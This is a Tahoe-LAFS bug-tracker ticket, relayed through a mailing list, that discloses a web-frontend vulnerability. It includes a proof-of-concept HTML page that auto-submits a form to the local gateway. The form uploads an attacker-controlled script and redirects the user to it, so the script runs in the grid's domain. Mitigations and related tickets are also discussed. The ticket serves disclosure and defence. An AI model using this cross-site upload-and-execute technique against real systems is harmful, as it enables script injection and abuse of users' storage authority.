[tahoe-lafs-trac-stream] [tahoe-lafs] #1859: Proof-of-concept attack: Upload and execute attacker controlled js from any domain.

tahoe-lafs trac at tahoe-lafs.org
Thu Jul 4 18:13:33 UTC 2013


#1859: Proof-of-concept attack: Upload and execute attacker controlled js from any
domain.
-------------------------+-------------------------------------------------
     Reporter:           |      Owner:  davidsarah
  nejucomo               |     Status:  new
         Type:  defect   |  Milestone:  undecided
     Priority:  major    |    Version:  1.9.2
    Component:  code-    |   Keywords:  security javascript same-origin
  frontend-web           |  capleak
   Resolution:           |
Launchpad Bug:           |
-------------------------+-------------------------------------------------

Old description:

> **Proof of Concept Attack**
>
> The following proof of concept shows how an html file loaded from any
> domain into (some) browsers with javascript enabled can inject an
> attacker controlled script into a grid, and //then// cause the user to
> execute that script in the domain of the grid:
>
> {{{
> <html>
> <head>
> <script>
>
> var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY
> ATTACKER CODE IN MAI DOMAIN " + document.domain +
> "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';
>
> window.onload = function () {
>   var payload_input = document.getElementById('payload_input');
>   payload_input.value = PAYLOAD
>
>   var the_form = document.getElementById('the_form');
>   the_form.submit();
> }
>
> </script>
> </head>
>
> <body id="body">
>
> <p>
> demo attack:
> </p>
>
> <p>
> This page attempts to inject an attacker controlled script into a <a
> href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
> this file is loaded from.
> </p>
>
> <form id="the_form"
>       method="POST"
> action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
>       enctype="multipart/form-data"
>       >
> <input id="payload_input" type="text" name="file"></input>
> </form>
>
> </body>
> </html>
> }}}
>
> **Mitigations**:
>
> There are several moving parts at work here.  The {{{when_done}}}
> parameter with uri substitution was very convenient.
>
> I think an upload capability would be the most consistent and thorough
> solution.  Removing bits and pieces which may otherwise be useful, like
> {{{when_done}}}, feels like a piecemeal defense.
>
> Requiring CSRF tokens may be more comprehensive, but also doesn't sit
> well with the rest of the capability model.  (A CSRF token would be a bit
> like a "make a this kind of http request" temporary capability.)
>
> **Related Tickets**:
>
> * #615 is about illicitly gaining victim capabilities; whereas this
> ticket is about bootstrapping an attack and/or abusing ambient authority.
> * #1215 is about adding CORS support and how that may create a
> vulnerability; this script demonstrates even without CORS support similar
> vulnerabilities already exist.

New description:

 **Proof of Concept Attack**

 The following proof of concept shows how an html file loaded from any
 domain into (some) browsers with javascript enabled can inject an attacker
 controlled script into a grid, and //then// cause the user to execute that
 script in the domain of the grid:

 {{{
 <html>
 <head>
 <script>

 var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY
 ATTACKER CODE IN MAI DOMAIN " + document.domain +
 "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

 window.onload = function () {
   var payload_input = document.getElementById('payload_input');
   payload_input.value = PAYLOAD

   var the_form = document.getElementById('the_form');
   the_form.submit();
 }

 </script>
 </head>

 <body id="body">

 <p>
 demo attack:
 </p>

 <p>
 This page attempts to inject an attacker controlled script into a <a
 href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
 this file is loaded from.
 </p>

 <form id="the_form"
       method="POST"
 action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
       enctype="multipart/form-data"
       >
 <input id="payload_input" type="text" name="file"></input>
 </form>

 </body>
 </html>
 }}}

 **Mitigations**:

 There are several moving parts at work here.  The {{{when_done}}}
 parameter with uri substitution was very convenient.

 I think an upload capability would be the most consistent and thorough
 solution.  Removing bits and pieces which may otherwise be useful, like
 {{{when_done}}}, feels like a piecemeal defense.

 Requiring CSRF tokens may be more comprehensive, but also doesn't sit well
 with the rest of the capability model.  (A CSRF token would be a bit like
 a "make a this kind of http request" temporary capability.)

 **Related Tickets**:

 * #615 is about illicitly gaining victim capabilities; whereas this ticket
 is about bootstrapping an attack and/or abusing ambient authority.
 * #1215 is about adding CORS support and how that may create a
 vulnerability; this script demonstrates even without CORS support similar
 vulnerabilities already exist.

--

Comment (by nejucomo):

 This is related to:

 * #587 "Web nodes provide ambient upload authority"
 * The accounting proposal - https://tahoe-lafs.org/trac/tahoe-
 lafs/browser/docs/proposed/accounting-overview.txt
   * Note: So long as the web interface requires an explicit, non-ambient
 authority for space usage, this attack vector will be less useful.

-- 
Ticket URL: <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1859#comment:9>
tahoe-lafs <https://tahoe-lafs.org>
secure decentralized storage


More information about the tahoe-lafs-trac-stream mailing list